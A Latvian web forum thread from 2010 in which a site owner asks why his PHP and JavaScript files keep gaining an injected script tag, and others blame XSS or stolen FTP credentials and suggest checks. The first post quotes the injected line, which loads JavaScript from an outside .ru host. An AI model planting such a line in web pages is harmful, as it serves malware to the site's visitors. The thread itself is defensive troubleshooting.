forSilence Posted July 13, 2010 Report Share Posted July 13, 2010 Tātad saskāros ar tādu problēmu, kad manai mājaslapai uzbrū visādi vīrus. Visos index.php un javascript failos tie kkādīgi iedabū iekšā savus Javascript, un antivītus tos uztev kā vīrusus, kā pret tādiem var izsargāties. Reku viens piemērs. <script type="text/javascript" src="http://pantscow.ru:8080/Video_Card.js"></script> <!--7458ca7842b7c19a28e6ba7806246db8--> Jo ir apnici visu laiku katrā failā dzēst ārā so rindiņu. Quote Link to comment Share on other sites More sharing options...
briedis Posted July 13, 2010 Report Share Posted July 13, 2010 Saucās XSS uzbrukumi... derētu filtrēt datus, kas tiek saņemti no lietotāja atkarīgi nolūka (vai DB, vai attēlošanai lapā).. Vēl, protams, jautājums, vai tā ir tevis taisīta sistēma, vai gatavs visiem pieejams produkts.. Quote Link to comment Share on other sites More sharing options...
Klez Posted July 14, 2010 Report Share Posted July 14, 2010 tas visticamāk ir uz tava datora. sūdīgs antivirus tev. vai arī vienk kkāds process sistēmā skenē failus un pieliek klāt šādas rindiņas. ja ir tāds process, tad tas nav vīrusss un neviens antivirus viņu neķers, jo vinsh neko sliktu nedara ... vieniigi vari meeginaat pats to kodu kādā failā ieliekt un noseivot failu. (vai antivirus kko saka vai nee) Quote Link to comment Share on other sites More sharing options...
forSilence Posted July 14, 2010 Author Report Share Posted July 14, 2010 (edited) Mana mājas lapa neatrodas uz mana datora, tā hostējas techpoint telpās. Un mana mājas lapa nav gatavs cms, tikai gatavi php skripti kas ņemti internetā. Bet ieejot manā mājas lapā uzreiz mans antivīrus uzrāda šo skriptu, kā vīrusu. Un arī daudziem citiem, kad ieiet manā mājas lapā uzrāda, šo skriptu kā vīrusu. Edited July 14, 2010 by forSilence Quote Link to comment Share on other sites More sharing options...
mefisto Posted July 14, 2010 Report Share Posted July 14, 2010 Tāpēc ka tas pilnīgi noteikti nav nekas labs. Un uz ko tieši tu cerēji, uzlasījis kaut kādus "gatavus php skriptus, kas ņemti internetā" ??! Skatie kodā un labo kļūdas. Quote Link to comment Share on other sites More sharing options...
ohmygod Posted July 14, 2010 Report Share Posted July 14, 2010 Kad man klientam šitāda lieta notikās - failus bija labojis FTP useris laikā, kad vienīgais usera lietotājs zvēr ka nav pat domājis par saitu. Attiecīgi - sliecos domāt, ka problēmas vainu ar FTP klientu vai serveri. Tb klientā kāds paroļu zaglis vai kas tamlīdzīgs. Ā un IP, no kuras notikās konekcijas, pilnīgi kreisa āzijas... Tā ka, ja ir iespējams - pačeko logus. Quote Link to comment Share on other sites More sharing options...
Klez Posted July 14, 2010 Report Share Posted July 14, 2010 ir bijusi arii man taada pieredze ka caur ftp labo failus. vai suudiiga ftp parole vai arii tev pc ir kaads keylogger kas tavu paroli aizsuutiijis sliktajiem puišiem. vai arī nosnīfota. vai arī hosteris tās pārdod :D, viena ftp pass, 3 aliņi :D Quote Link to comment Share on other sites More sharing options...
forSilence Posted July 14, 2010 Author Report Share Posted July 14, 2010 Nomainīju FTP paroli un ceru ka vairs neuzlauzīs. Quote Link to comment Share on other sites More sharing options...
mounkuls Posted July 14, 2010 Report Share Posted July 14, 2010 Es par to nebūtu tik drošs:) Pārliecinies vai nav kādi modificēti vai papildu nākuši klāt faili uz hosta sākumā, savādāk ļaundarim tā parole pie pakaļas ir:) Quote Link to comment Share on other sites More sharing options...
forSilence Posted July 14, 2010 Author Report Share Posted July 14, 2010 Nekādu citu failu no hosta nav. Tikai mani, bet varbūt man uz tā paša hosta atrodas arī Cs serveris ar to pašu FTP pieeju, varbūt arī caur serveri var kkādus vīrusus pielaist? Quote Link to comment Share on other sites More sharing options...
mounkuls Posted July 14, 2010 Report Share Posted July 14, 2010 Es protams sīkumos nezinu kas tam CS serverim tur ir, bet neliekas loģiski, ka tam ir kādas funkcijas, kur vajadzīga FTP parole. Quote Link to comment Share on other sites More sharing options...
Maris-S Posted July 14, 2010 Report Share Posted July 14, 2010 (edited) Vienu izplatītāko iespēju, kā varēja ievietot skriptus, Briedis jau pieminēja. Tomēr ja skripti ir failos pa tiešo, tad tur ir kas sarežģītāks un jāskatās pa kurieni tikuši klāt Taviem failiem. Papildus šeit jau aprakstītajai ftp paroļu un servera drošības pārbaudei pārliecinies vai ar php skriptiem viss ir kārtībā (tiem kas darbojas ar failiem, ja tādi ir). Iespējams Tu izmanto kādus ne sevis taisītos skriptus tieši darbībām ar failiem (failu manageriem), ja tādi ir, pārliecinies ka esi nomainījis visas noklusētās paroles, caur tiem var tikt klāt, pašam ir gadījies. Ja Tavs CS serveris ir uzstādīts tādā veidā ka tā izpildes skripti var piekļūt arī otrajai mājas lapai, tad caur to arī varēja piekļūt failiem, tātad tur arī jāpārbauda failu apstrādes skripti. Edited July 14, 2010 by Maris-S Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.